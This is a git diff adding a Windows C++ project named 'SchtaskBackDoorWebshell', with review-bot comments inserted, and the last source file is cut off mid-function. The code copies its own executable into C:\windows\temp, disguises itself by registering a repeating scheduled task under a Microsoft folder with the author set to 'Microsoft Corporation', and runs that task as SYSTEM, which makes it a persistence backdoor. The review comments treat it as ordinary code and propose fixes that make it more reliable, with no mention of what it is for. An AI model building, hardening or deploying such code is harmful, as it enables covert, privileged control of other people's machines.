+[Oo]bj/
+[Ll]og/
+[Ll]ogs/
+
+# Visual Studio 2015/2017 cache/options directory
+.vs/
+# Uncomment if you have tasks that create the project's static files in wwwroot
+#wwwroot/
+
+# Visual Studio 2017 auto generated files
+Generated\ Files/
+
+# MSTest test Results
+[Tt]est[Rr]esult*/
+[Bb]uild[Ll]og.*
+
+# NUnit
+*.VisualState.xml
+TestResult.xml
+nunit-*.xml
+
+# Build Results of an ATL Project
+[Dd]ebugPS/
+[Rr]eleasePS/
+dlldata.c
+
+# Benchmark Results
+BenchmarkDotNet.Artifacts/
+
+# .NET Core
+project.lock.json
+project.fragment.lock.json
+artifacts/
+
+# StyleCop
+StyleCopReport.xml
+
+# Files built by Visual Studio
+*_i.c
+*_p.c
+*_h.h
+*.ilk
+*.meta
+*.obj
+*.iobj
+*.pch
+*.pdb
+*.ipdb
+*.pgc
+*.pgd
+*.rsp
+*.sbr
+*.tlb
+*.tli
+*.tlh
+*.tmp
+*.tmp_proj
+*_wpftmp.csproj
+*.log
+*.vspscc
+*.vssscc
+.builds
+*.pidb
+*.svclog
+*.scc
+
+# Chutzpah Test files
+_Chutzpah*
+
+# Visual C++ cache files
+ipch/
+*.aps
+*.ncb
+*.opendb
+*.opensdf
+*.sdf
+*.cachefile
+*.VC.db
+*.VC.VC.opendb
+
+# Visual Studio profiler
+*.psess
+*.vsp
+*.vspx
+*.sap
+
+# Visual Studio Trace Files
+*.e2e
+
+# TFS 2012 Local Workspace
+$tf/
+
+# Guidance Automation Toolkit
+*.gpState
+
+# ReSharper is a .NET coding add-in
+_ReSharper*/
+*.[Rr]e[Ss]harper
+*.DotSettings.user
+
+# JustCode is a .NET coding add-in
+.JustCode
+
+# TeamCity is a build add-in
+_TeamCity*
+
+# DotCover is a Code Coverage Tool
+*.dotCover
+
+# AxoCover is a Code Coverage Tool
+.axoCover/*
+!.axoCover/settings.json
+
+# Visual Studio code coverage results
+*.coverage
+*.coveragexml
+
+# NCrunch
+_NCrunch_*
+.*crunch*.local.xml
+nCrunchTemp_*
+
+# MightyMoose
+*.mm.*
+AutoTest.Net/
+
+# Web workbench (sass)
+.sass-cache/
+
+# Installshield output folder
+[Ee]xpress/
+
+# DocProject is a documentation generator add-in
+DocProject/buildhelp/
+DocProject/Help/*.HxT
+DocProject/Help/*.HxC
+DocProject/Help/*.hhc
+DocProject/Help/*.hhk
+DocProject/Help/*.hhp
+DocProject/Help/Html2
+DocProject/Help/html
+
+# Click-Once directory
+publish/
+
+# Publish Web Output
+*.[Pp]ublish.xml
+*.azurePubxml
+# Note: Comment the next line if you want to checkin your web deploy settings,
+# but database connection strings (with potential passwords) will be unencrypted
+*.pubxml
+*.publishproj
+
+# Microsoft Azure Web App publish settings. Comment the next line if you want to
+# checkin your Azure Web App publish settings, but sensitive information contained
+# in these scripts will be unencrypted
+PublishScripts/
+
+# NuGet Packages
+*.nupkg
+# NuGet Symbol Packages
+*.snupkg
+# The packages folder can be ignored because of Package Restore
+**/[Pp]ackages/*
+# except build/, which is used as an MSBuild target.
+!**/[Pp]ackages/build/
+# Uncomment if necessary however generally it will be regenerated when needed
+#!**/[Pp]ackages/repositories.config
+# NuGet v3's project.json files produces more ignorable files
+*.nuget.props
+*.nuget.targets
+
+# Microsoft Azure Build Output
+csx/
+*.build.csdef
+
+# Microsoft Azure Emulator
+ecf/
+rcf/
+
+# Windows Store app package directories and files
+AppPackages/
+BundleArtifacts/
+Package.StoreAssociation.xml
+_pkginfo.txt
+*.appx
+*.appxbundle
+*.appxupload
+
+# Visual Studio cache files
+# files ending in .cache can be ignored
+*.[Cc]ache
+# but keep track of directories ending in .cache
+!?*.[Cc]ache/
+
+# Others
+ClientBin/
+~$*
+*~
+*.dbmdl
+*.dbproj.schemaview
+*.jfm
+*.pfx
+*.publishsettings
+orleans.codegen.cs
+
+# Including strong name files can present a security risk
+# (https://github.com/github/gitignore/pull/2483#issue-259490424)
+#*.snk
+
+# Since there are multiple workflows, uncomment next line to ignore bower_components
+# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
+#bower_components/
+
+# RIA/Silverlight projects
+Generated_Code/
+
+# Backup & report files from converting an old project file
+# to a newer Visual Studio version. Backup files are not needed,
+# because we have git ;-)
+_UpgradeReport_Files/
+Backup*/
+UpgradeLog*.XML
+UpgradeLog*.htm
+ServiceFabricBackup/
+*.rptproj.bak
+
+# SQL Server files
+*.mdf
+*.ldf
+*.ndf
+
+# Business Intelligence projects
+*.rdl.data
+*.bim.layout
+*.bim_*.settings
+*.rptproj.rsuser
+*- [Bb]ackup.rdl
+*- [Bb]ackup ([0-9]).rdl
+*- [Bb]ackup ([0-9][0-9]).rdl
+
+# Microsoft Fakes
+FakesAssemblies/
+
+# GhostDoc plugin setting file
+*.GhostDoc.xml
+
+# Node.js Tools for Visual Studio
+.ntvs_analysis.dat
+node_modules/
+
+# Visual Studio 6 build log
+*.plg
+
+# Visual Studio 6 workspace options file
+*.opt
+
+# Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
+*.vbw
+
+# Visual Studio LightSwitch build output
+**/*.HTMLClient/GeneratedArtifacts
+**/*.DesktopClient/GeneratedArtifacts
+**/*.DesktopClient/ModelManifest.xml
+**/*.Server/GeneratedArtifacts
+**/*.Server/ModelManifest.xml
+_Pvt_Extensions
+
+# Paket dependency manager
+.paket/paket.exe
+paket-files/
+
+# FAKE - F# Make
+.fake/
+
+# CodeRush personal settings
+.cr/personal
+
+# Python Tools for Visual Studio (PTVS)
+__pycache__/
+*.pyc
+
+# Cake - Uncomment if you are using it
+# tools/**
+# !tools/packages.config
+
+# Tabs Studio
+*.tss
+
+# Telerik's JustMock configuration file
+*.jmconfig
+
+# BizTalk build output
+*.btp.cs
+*.btm.cs
+*.odx.cs
+*.xsd.cs
+
+# OpenCover UI analysis results
+OpenCover/
+
+# Azure Stream Analytics local run output
+ASALocalRun/
+
+# MSBuild Binary and Structured Log
+*.binlog
+
+# NVidia Nsight GPU debugger configuration file
+*.nvuser
+
+# MFractors (Xamarin productivity tool) working folder
+.mfractor/
+
+# Local History for Visual Studio
+.localhistory/
+
+# BeatPulse healthcheck temp database
+healthchecksdb
+
+# Backup folder for Package Reference Convert tool in Visual Studio 2017
+MigrationBackup/
+
+# Ionide (cross platform F# VS Code tools) working folder
+.ionide/
diff --git a/SchtaskBackDoorWebshell/SchtaskBackDoorWebshell.sln b/SchtaskBackDoorWebshell/SchtaskBackDoorWebshell.sln
new file mode 100644
index 0000000..b5d9ad3
--- /dev/null
+++ b/SchtaskBackDoorWebshell/SchtaskBackDoorWebshell.sln
@@ -0,0 +1,31 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 16
+VisualStudioVersion = 16.0.30011.22
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SchtaskBackDoorWebshell", "SchtaskBackDoorWebshell.vcxproj", "{6BF9BC0B-8C41-4BF3-86F6-FF4651942671}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|x64 = Debug|x64
+ Debug|x86 = Debug|x86
+ Release|x64 = Release|x64
+ Release|x86 = Release|x86
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {6BF9BC0B-8C41-4BF3-86F6-FF4651942671}.Debug|x64.ActiveCfg = Debug|x64
+ {6BF9BC0B-8C41-4BF3-86F6-FF4651942671}.Debug|x64.Build.0 = Debug|x64
+ {6BF9BC0B-8C41-4BF3-86F6-FF4651942671}.Debug|x86.ActiveCfg = Debug|Win32
+ {6BF9BC0B-8C41-4BF3-86F6-FF4651942671}.Debug|x86.Build.0 = Debug|Win32
+ {6BF9BC0B-8C41-4BF3-86F6-FF4651942671}.Release|x64.ActiveCfg = Release|x64
+ {6BF9BC0B-8C41-4BF3-86F6-FF4651942671}.Release|x64.Build.0 = Release|x64
+ {6BF9BC0B-8C41-4BF3-86F6-FF4651942671}.Release|x86.ActiveCfg = Release|Win32
+ {6BF9BC0B-8C41-4BF3-86F6-FF4651942671}.Release|x86.Build.0 = Release|Win32
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+ GlobalSection(ExtensibilityGlobals) = postSolution
+ SolutionGuid = {ED7739FF-5004-4C24-B0AC-C4462872896A}
+ EndGlobalSection
+EndGlobal
diff --git a/SchtaskBackDoorWebshell/SchtaskBackDoorWebshell.vcxproj b/SchtaskBackDoorWebshell/SchtaskBackDoorWebshell.vcxproj
new file mode 100644
index 0000000..bfec83d
--- /dev/null
+++ b/SchtaskBackDoorWebshell/SchtaskBackDoorWebshell.vcxproj
@@ -0,0 +1,150 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Release
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ x64
+
+
+
+ 16.0
+ {6BF9BC0B-8C41-4BF3-86F6-FF4651942671}
+ SchtaskBackDoorWebshell
+ 10.0
+
+
+
+ Application
+ true
+ v142
+ Unicode
+
+
+ Application
+ false
+ v110_xp
+ true
+ Unicode
+
+
+ Application
+ true
+ v142
+ Unicode
+
+
+ Application
+ false
+ v142
+ true
+ Unicode
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ true
+
+
+ true
+
+
+ false
+
+
+ false
+
+
+
+ Level3
+ true
+ _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ true
+ _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ true
+ true
+ true
+ NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+ true
+ false
+
+
+
+
+ Level3
+ true
+ true
+ true
+ NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/SchtaskBackDoorWebshell/SchtaskBackDoorWebshell.vcxproj.filters b/SchtaskBackDoorWebshell/SchtaskBackDoorWebshell.vcxproj.filters
new file mode 100644
index 0000000..f6343b9
--- /dev/null
+++ b/SchtaskBackDoorWebshell/SchtaskBackDoorWebshell.vcxproj.filters
@@ -0,0 +1,30 @@
+
+
+
+
+ {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
+ cpp;c;cc;cxx;c++;def;odl;idl;hpj;bat;asm;asmx
+
+
+ {93995380-89BD-4b04-88EB-625FBE52EBFB}
+ h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
+
+
+ {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
+ rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
+
+
+
+
+ 源文件
+
+
+ 源文件
+
+
+
+
+ 头文件
+
+
+
\ No newline at end of file
diff --git a/SchtaskBackDoorWebshell/TaskScheduler.cpp b/SchtaskBackDoorWebshell/TaskScheduler.cpp
new file mode 100644
index 0000000..5b963ae
--- /dev/null
+++ b/SchtaskBackDoorWebshell/TaskScheduler.cpp
@@ -0,0 +1,332 @@
+#include "TaskScheduler.h"
+
+
+void TaskSche::CopySelf()
+{
+ WCHAR pathF[MAX_LEN_FILENAME];
+ GetModuleFileName(NULL, pathF, sizeof(pathF));
+ WCHAR dest[] = _T("C:\\windows\\temp\\tempsh.exe");
+ wprintf(L"%s", pathF);
+ CopyFile(pathF, dest, false);
+}
+
+
+void TaskSche::copyFile(string source, string dest) {
+ ifstream src(source, ios::binary);
+ ofstream dst(dest, ios::binary);
+ dst << src.rdbuf();
+ dst.close();
+ src.close();
+}
+
+
+int TaskSche::isFileExist(LPSTR lpFilePath)
+{
+ /* Check for existence */
+ if ((_access(lpFilePath, 0)) != -1)
+ {
+ return 1;
+ }
+ else
+ {
+ return 0;
+ }
+}
+
+
+int TaskSche::TaskAdd(LPCWSTR wszTaskName, wstring wstrTaskTime, wstring wstrProgram, wstring args)
+{
+ // https://docs.microsoft.com/zh-cn/windows/win32/taskschd/time-trigger-example--c---
+ // https://docs.microsoft.com/zh-cn/windows/win32/taskschd/daily-trigger-example--c---
+
+ setlocale(LC_ALL, "");
+
+ // ʼCOM
+ HRESULT hr = CoInitializeEx(NULL, COINIT_MULTITHREADED);
+ if (FAILED(hr))
+ {
+ printf("\nCoInitializeEx failed: %x", hr);
+ return 1;
+ }
+
+
+ // ȫȼ
+ hr = CoInitializeSecurity(NULL, -1, NULL, NULL, RPC_C_AUTHN_LEVEL_PKT_PRIVACY, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, 0, NULL);
+ if (FAILED(hr))
+ {
+ printf("\nCoInitializeSecurity failed: %x", hr);
+ CoUninitialize();
+ return 1;
+ }
+
+ // üƻ
+ // LPCWSTR wszTaskName = L"StateGrid";
+ wprintf(L"TaskName:%s\n", wszTaskName);
+
+ // ִ·
+ wstring wstrExePath = _wgetenv(_bstr_t(L"WINDIR")); // ȡַĻ
+ wstrExePath += L"\\SYSTEM32\\";
+ wstrExePath += wstrProgram;
+
+
+ //
+ // Link: https://docs.microsoft.com/en-us/windows/win32/api/taskschd/nn-taskschd-itaskservice
+ // https://docs.microsoft.com/en-us/windows/win32/api/combaseapi/nf-combaseapi-cocreateinstance
+ ITaskService* pService = NULL;
+ hr = CoCreateInstance(CLSID_TaskScheduler, NULL, CLSCTX_INPROC_SERVER, IID_ITaskService, (void**)&pService);
+ if (FAILED(hr))
+ {
+ printf("Failed to create an instance of ITaskService: %x", hr);
+ CoUninitialize();
+ return 1;
+ }
+
+ // ĿΪԶӻط https://docs.microsoft.com/en-us/windows/win32/api/taskschd/nf-taskschd-itaskservice-connect
+ hr = pService->Connect(_variant_t(), _variant_t(), _variant_t(), _variant_t()); //Ĭϱ
+ if (FAILED(hr))
+ {
+ printf("ITaskService::Connect failed: %x", hr);
+ pService->Release();
+ CoUninitialize();
+ return 1;
+ }
+
+ // ȡļвд
+ ITaskFolder* pRootFolder = NULL; https://docs.microsoft.com/en-us/windows/win32/api/taskschd/nf-taskschd-itaskservice-getfolder
+ // ƻ·
+ hr = pService->GetFolder(_bstr_t(L"\\Microsoft\\Windows\\AppID"), &pRootFolder); // _bstr_t wstrתΪbstr
+ if (FAILED(hr))
+ {
+ printf("Cannot get Root folder pointer: %x", hr);
+ pService->Release();
+ CoUninitialize();
+ return 1;
+ }
+ wprintf(L"Task Path\\Microsoft\\Windows\\AppID\n");
+
+ // ǷѾƻ
+ IRegisteredTask* pExistingTask = NULL;
+ hr = pRootFolder->GetTask(_bstr_t(wszTaskName), &pExistingTask);
+ if (hr == S_OK)
+ {
+ printf("Task exist!\n");
+ return 1;
+ }
+ printf("Create New Task\n");
+
+ // ͬɾ
+ // pRootFolder->DeleteTask(_bstr_t(wszTaskName), 0);
+
+ // ƻƻ
+ ITaskDefinition* pTask = NULL; // https://docs.microsoft.com/en-us/windows/win32/api/taskschd/nn-taskschd-itaskdefinition
+ hr = pService->NewTask(0, &pTask); // https://docs.microsoft.com/en-us/windows/win32/api/taskschd/nf-taskschd-itaskservice-newtask
+ pService->Release(); // COM clean up. Pointer is no longer used.
+ if (FAILED(hr))
+ {
+ printf("Failed to CoCreate an instance of the TaskService class: %x", hr);
+ pRootFolder->Release();
+ CoUninitialize();
+ return 1;
+ }
+
+
+ // ʹIRegistrationInfoĻϢ
+ // https://docs.microsoft.com/en-us/windows/win32/api/taskschd/nn-taskschd-iregistrationinfo
+ // ȡעϢԼעڡ
+ // ITaskDefinition :: get_RegistrationInfo https://docs.microsoft.com/en-us/windows/win32/api/taskschd/nf-taskschd-itaskdefinition-get_registrationinfo
+ IRegistrationInfo* pRegInfo = NULL;
+ hr = pTask->get_RegistrationInfo(&pRegInfo);
+ if (FAILED(hr))
+ {
+ printf("\nCannot get identification pointer: %x", hr);
+ pRootFolder->Release();
+ pTask->Release();
+ CoUninitialize();
+ return 1;
+ }
+
+ //
+ hr = pRegInfo->put_Author(_bstr_t(L"Microsoft Corporation"));
+ pRegInfo->Release();
+ if (FAILED(hr))
+ {
+ printf("\nCannot put identification info: %x", hr);
+ pRootFolder->Release();
+ pTask->Release();
+ CoUninitialize();
+ return 1;
+ }
+
+
+
+
+ // İȫƾ֤ https://docs.microsoft.com/zh-cn/windows/win32/api/taskschd/nn-taskschd-iprincipal
+ IPrincipal* pPrincipal = NULL;
+ hr = pTask->get_Principal(&pPrincipal); // ȡ壬ṩİȫƾݡ
+ if (FAILED(hr))
+ {
+ printf("\nCannot get principal pointer: %x", hr);
+ pRootFolder->Release();
+ pTask->Release();
+ CoUninitialize();
+ return 1;
+ }
+
+ // ùΪʽ¼
+ pPrincipal->put_LogonType(TASK_LOGON_INTERACTIVE_TOKEN); // ʹûǰĵ¼Ϣ
+ //pPrincipal->put_RunLevel(TASK_RUNLEVEL_HIGHEST);
+ pPrincipal->put_UserId(_bstr_t(L"NT AUTHORITY\\SYSTEM")); // systemȨִУԵǰûȨҪǹԱȨ
+
+ // Ϣ,ƻѡĸϢ https://docs.microsoft.com/zh-cn/windows/win32/api/taskschd/nn-taskschd-itasksettings
+ ITaskSettings* pTaskSettings = NULL;
+ pTask->get_Settings(&pTaskSettings);
+
+ // ΪϢֵ
+ pTaskSettings->put_StartWhenAvailable(VARIANT_TRUE); // ĬΪVARIANT_TRUE https://docs.microsoft.com/zh-cn/windows/win32/api/taskschd/nf-taskschd-itasksettings-put_startwhenavailable
+
+ // idle
+ IIdleSettings* pIdleSettings = NULL;
+ pTaskSettings->get_IdleSettings(&pIdleSettings);
+ pIdleSettings->put_WaitTimeout(_bstr_t(L"PT5M"));
+
+ // IJУһܹ
+ pTaskSettings->put_MultipleInstances(TASK_INSTANCES_PARALLEL); // https://docs.microsoft.com/zh-cn/windows/win32/api/taskschd/nf-taskschd-itasksettings-get_multipleinstances https://docs.microsoft.com/zh-cn/windows/win32/taskschd/taskschedulerschema-multipleinstancespolicytype-simpletype
+
+
+ //
+ ITriggerCollection* pTriggerCollection = NULL;
+ hr = pTask->get_Triggers(&pTriggerCollection); // ȡĴļϡ
+ if (FAILED(hr))
+ {
+ printf("\nCannot get trigger collection: %x", hr);
+ pRootFolder->Release();
+ pTask->Release();
+ CoUninitialize();
+ return 1;
+ }
+
+ ITrigger* pTrigger = NULL;
+
+ //
+ /*
+ ´https://docs.microsoft.com/en-us/windows/win32/api/taskschd/nf-taskschd-itriggercollection-create
+ ԣhttps://docs.microsoft.com/en-us/windows/win32/api/mstask/ns-mstask-task_trigger
+ https://docs.microsoft.com/zh-cn/windows/win32/api/mstask/nf-mstask-itasktrigger-settrigger
+ TASK_TRIGGER_LOGON: ضû¼ʱ
+ TASK_TRIGGER_TIME: һضʱ䴥
+ */
+
+ // ʱ
+ /*
+ еƵԼظظģʽʱ䣺https://docs.microsoft.com/en-us/windows/win32/api/taskschd/nn-taskschd-irepetitionpattern
+
+ ITrigger :: put_StartBoundary üںʱ䡣ںʱ¸ʽYYYY-MM-DDTHHMMSS+-HHMMʽģ+-HHMMֶЭʱUTC֮ǰ֮ضСʱͷ磬200510111:21:17UTCʱСʱдΪ2005-10-11T132117
+ https://docs.microsoft.com/en-us/windows/win32/api/taskschd/nf-taskschd-itrigger-put_startboundary
+
+ repetitionType ָģʽظʱ䡣ַĸʽΪPnYnMnDTnHnMnSnYnMnD T/ʱָnHСʱnMǷnS磬PT5Mָ5ӣP1M4DT2H5Mָһ£죬Сʱӣ
+ https://docs.microsoft.com/zh-cn/windows/win32/taskschd/taskschedulerschema-duration-repetitiontype-element
+
+
+ */
+
+ // ÿ
+ hr = pTriggerCollection->Create(TASK_TRIGGER_TIME, &pTrigger);
+ pTriggerCollection->Release();
+ ITimeTrigger* pTimeTrigger = NULL;
+ pTrigger->QueryInterface(IID_ITimeTrigger, (void**)&pTimeTrigger);
+ pTimeTrigger->put_Id(_bstr_t(L"Trigger0"));
+ pTimeTrigger->put_StartBoundary(_bstr_t(L"2000-04-01T00:00:00")); // üںʱ:2000-04-01ʼÿ00:00:00
+ pTimeTrigger->put_EndBoundary(_bstr_t(L"2030-05-02T23:59:59")); // ͣôںʱ:2030-05-02 23:59:59
+ IRepetitionPattern* pRepetitionPattern = NULL;
+ pTimeTrigger->get_Repetition(&pRepetitionPattern);
+ pTimeTrigger->Release();
+ pRepetitionPattern->put_Duration(_bstr_t(L"")); // ģʽظʱ䡣ڳʱδָκֵģʽظ
+ // pRepetitionPattern->put_Interval(_bstr_t(L"PT30M")); // ÿ֮ʱ䡣ÿô
+ pRepetitionPattern->put_Interval(_bstr_t(wstrTaskTime.data())); // ÿ֮ʱ䡣ÿô
+ pRepetitionPattern->Release();
+
+
+
+ // ÿ
+ /*
+ hr = pTriggerCollection->Create(TASK_TRIGGER_DAILY, &pTrigger);
+ pTriggerCollection->Release();
+ IDailyTrigger* pDailyTrigger = NULL;
+ pTrigger->QueryInterface(IID_IDailyTrigger, (void**)&pDailyTrigger);
+ pDailyTrigger->put_Id(_bstr_t(L"Trigger0"));
+ pDailyTrigger->put_StartBoundary(_bstr_t(L"2000-04-01T00:00:00")); // üںʱ:2000-04-01ʼÿ00:00:00
+ pDailyTrigger->put_EndBoundary(_bstr_t(L"2030-05-02T23:59:59")); // ͣôںʱ:2030-05-02 23:59:59
+ pDailyTrigger->put_DaysInterval((short)1); // üƻи֮ļ1ÿռƻ2ÿһʱ
+ IRepetitionPattern* pRepetitionPattern = NULL;
+ pDailyTrigger->get_Repetition(&pRepetitionPattern);
+ pDailyTrigger->Release();
+ pRepetitionPattern->put_Duration(_bstr_t(L"")); // ģʽظʱ䡣ڳʱδָκֵģʽظ
+ pRepetitionPattern->put_Interval(_bstr_t(L"PT1M")); // ÿ֮ʱ䡣ÿô
+ pRepetitionPattern->Release();
+ */
+
+
+ // ʱ䴥
+ /*
+ pTriggerCollection->Create(TASK_TRIGGER_TIME, &pTrigger);
+ ITimeTrigger* pTimeTrigger = NULL;
+ pTrigger->QueryInterface(IID_ITimeTrigger, (void**)&pTimeTrigger);
+ pTimeTrigger->put_Id(_bstr_t(L"Trigger1"));
+ pTimeTrigger->put_EndBoundary(_bstr_t(L"2020-03-29T20:00:00"));
+ pTimeTrigger->put_StartBoundary(_bstr_t(L"2020-03-26T13:00:00"));
+ */
+
+ // ¼
+ /*
+ pTriggerCollection->Create(TASK_TRIGGER_LOGON, &pTrigger);
+ ILogonTrigger* pLogonTrigger = NULL;
+ pTrigger->QueryInterface(IID_ILogonTrigger, (void**)&pLogonTrigger);
+ pLogonTrigger->put_Id(_bstr_t(L"Trigger2"));
+ //pLogonTrigger->put_UserId(_bstr_t(L"desktop-gdep6gd\\user"));
+ //pLogonTrigger->put_EndBoundary(_bstr_t(L"2020-03-29T20:00:00"));
+ pLogonTrigger->put_StartBoundary(_bstr_t(L"2020-03-25T20:00:00"));
+ */
+
+
+ //
+ /*
+ pTriggerCollection->Create(TASK_TRIGGER_BOOT, &pTrigger);
+ IBootTrigger* pBootTrigger;
+ pTrigger->QueryInterface(IID_IBootTrigger, (void**)&pBootTrigger);
+ pBootTrigger->put_Id(_bstr_t(L"Trigger3"));
+ pBootTrigger->put_EndBoundary(_bstr_t(L"2020-03-29T20:00:00"));
+ pBootTrigger->put_StartBoundary(_bstr_t(L"2020-03-25T20:00:00"));
+ */
+
+ //
+ IActionCollection* pActionCollection = NULL;
+ pTask->get_Actions(&pActionCollection);
+ IAction* pAction = NULL;
+ pActionCollection->Create(TASK_ACTION_EXEC, &pAction); // TASK_ACTION_EXEC: òִв磬òнűִļߣṩĵƣҵӦóʹĵӦó
+ IExecAction* pExecAction = NULL; // IExecAction ʾִвIJ
+ pAction->QueryInterface(IID_IExecAction, (void**)&pExecAction);
+ pExecAction->put_Path(_bstr_t(wstrExePath.c_str())); // ȡÿִļ·
+ pExecAction->Release();
+
+ // ִгIJ
+
+ // wstring args(L"/c C:\\windows\\temp\\StateGrid.exe");
+ // args.append(cmd);
+ // args += argv[2];
+
+ wprintf(L"Command:%s %s\n", wstrProgram.data(), args.data());
+ pExecAction->put_Arguments(_bstr_t(args.data()));
+
+
+ // pExecAction->put_Arguments(_bstr_t(L"/c calc"));
+
+ IRegisteredTask* pRegistredTask = NULL;
+ pRootFolder->RegisterTaskDefinition(_bstr_t(wszTaskName), pTask, TASK_CREATE_OR_UPDATE,
+ _variant_t(), _variant_t(), TASK_LOGON_INTERACTIVE_TOKEN, _variant_t(), &pRegistredTask);
+
+ cout << "\n .\n" << endl;
+ wprintf(L"**********\n");
+ CoUninitialize();
+ return 0;
+
+}
\ No newline at end of file
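Review bot: `GetModuleFileName(NULL, pathF, sizeof(pathF));` in CopySelf passes a byte count where the API expects a count of WCHARs, so it advertises a buffer twice as large as `pathF` and a long module path can overrun the stack array; use `GetModuleFileName(NULL, pathF, MAX_LEN_FILENAME);` (or `_countof(pathF)`). In TaskAdd, `pExecAction->Release();` is followed later by `pExecAction->put_Arguments(...)`, a call through an already-released interface pointer that only works because `pAction` still holds the object — move the Release after put_Arguments. The early `return 1;` on "Task exist!" skips CoUninitialize and leaks pExistingTask, pRootFolder and pService, the HRESULTs from pTriggerCollection->Create, the QueryInterface calls and RegisterTaskDefinition are never checked so the function returns 0 even when registration failed, and pTask, pRootFolder, pTaskSettings, pIdleSettings, pActionCollection, pAction and pRegistredTask are never released; the tail of the function below checks the registration result and releases everything it acquired, and the early-return branch needs the same releases before it leaves. The bare `https://docs.microsoft.com/...` appended to `ITaskFolder* pRootFolder = NULL;` compiles only because `https:` parses as a label and `//` starts a comment; move it into the comment on the following line. Most of the comments are mojibake from a non-UTF-8 source encoding; re-save the file as UTF-8 or rewrite them in English so they survive tooling.
```cpp
    // … unchanged: trigger and action setup …
    IRegisteredTask* pRegistredTask = NULL;
    hr = pRootFolder->RegisterTaskDefinition(_bstr_t(wszTaskName), pTask, TASK_CREATE_OR_UPDATE,
        _variant_t(), _variant_t(), TASK_LOGON_INTERACTIVE_TOKEN, _variant_t(), &pRegistredTask);
    if (FAILED(hr))
    {
        printf("\nRegisterTaskDefinition failed: %x", hr);
    }
    // Release in reverse order of acquisition; the pointers whose producing
    // calls are not verified above are NULL-checked before use.
    if (pRegistredTask) pRegistredTask->Release();
    if (pAction) pAction->Release();
    if (pActionCollection) pActionCollection->Release();
    if (pIdleSettings) pIdleSettings->Release();
    if (pTaskSettings) pTaskSettings->Release();
    pTask->Release();
    pRootFolder->Release();
    CoUninitialize();
    return FAILED(hr) ? 1 : 0;
```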
diff --git a/SchtaskBackDoorWebshell/TaskScheduler.h b/SchtaskBackDoorWebshell/TaskScheduler.h
new file mode 100644
index 0000000..fa929ae
--- /dev/null
+++ b/SchtaskBackDoorWebshell/TaskScheduler.h
@@ -0,0 +1,37 @@
+#pragma once
+#define _CRT_SECURE_NO_WARNINGS // ȫ
+#include
+#include
+#include
+#include // std::wstring
+#include
+#include
+#include // ITaskService
+#include "comdef.h" // _bstr_t
+#include "string.h"
+#include
+#include
+#include
+#include // src dst
+
+#define _WIN32_DCOM
+
+// Include the task header file.
+#pragma comment(lib, "taskschd.lib")
+#pragma comment(lib, "comsupp.lib")
+#pragma comment(lib, "credui.lib")
+using namespace std;
+#define MAX_LEN_FILENAME 1024
+
+class TaskSche
+{
+public:
+ int TaskAdd(LPCWSTR wszTaskName, wstring wstrTaskTime, wstring wstrProgram, wstring args);
+ void CopySelf();
+ int isFileExist(LPSTR lpFilePath);
+ void copyFile(string source, string dest);
+
+private:
+
+};
+
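Review bot: `#define _WIN32_DCOM` is placed after all the `#include` lines, so it cannot influence the Windows headers it is meant to configure; it belongs before the first include, next to `_CRT_SECURE_NO_WARNINGS` (on current SDKs the default `_WIN32_WINNT` probably masks this, but the define is dead where it stands). `using namespace std;` in a header is injected into every translation unit that includes it; prefer writing `std::wstring` and `std::string` in the TaskSche declaration and dropping the directive. Nothing visible in this commit references credui, so `#pragma comment(lib, "credui.lib")` looks like a leftover — confirm before keeping it. The class has no documentation; a one-line comment per method, e.g. `// Copies the running executable to C:\windows\temp\tempsh.exe; the result of CopyFile is not checked.` above `void CopySelf();`, would make the contract and the unchecked failure visible at the declaration.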
diff --git "a/SchtaskBackDoorWebshell/\346\272\220.cpp" "b/SchtaskBackDoorWebshell/\346\272\220.cpp"
new file mode 100644
index 0000000..a0d0ada
--- /dev/null
+++ "b/SchtaskBackDoorWebshell/\346\272\220.cpp"
@@ -0,0 +1,51 @@
+#include "TaskScheduler.h"
+
+// wchar_t to string
+void Wchar_tToString(std::string& szDst, wchar_t* wchar)
+{
+ wchar_t* wText = wchar;
+ DWORD dwNum = WideCharToMultiByte(CP_OEMCP, NULL, wText, -1, NULL, 0, NULL, FALSE);// WideCharToMultiByte
+ char* psText; // psTextΪchar*ʱ飬Ϊֵstd::stringм
+ psText = new char[dwNum];
+ WideCharToMultiByte(CP_OEMCP, NULL, wText, -1, psText, dwNum, NULL, FALSE);// WideCharToMultiByteٴ
+ szDst = psText;// std::stringֵ
+ delete[]psText;// psText
+}
+
+// localestringͷļʹsetlocale
+std::wstring StringToWstring(const std::string str)
+{// stringתwstring
+ unsigned len = str.size() * 2;// Ԥֽ
+ setlocale(LC_CTYPE, ""); //ô˺
+ wchar_t* p = new wchar_t[len];// һڴתַ
+ mbstowcs(p, str.c_str(), len);// ת
+ std::wstring str1(p);
+ delete[] p;// ͷڴ
+ return str1;
+}
+
+int wmain(int argc, wchar_t* argv[]) {
+ TaskSche task;
+ if (argc == 2) {
+ string strFilePath;
+ Wchar_tToString(strFilePath, argv[1]);
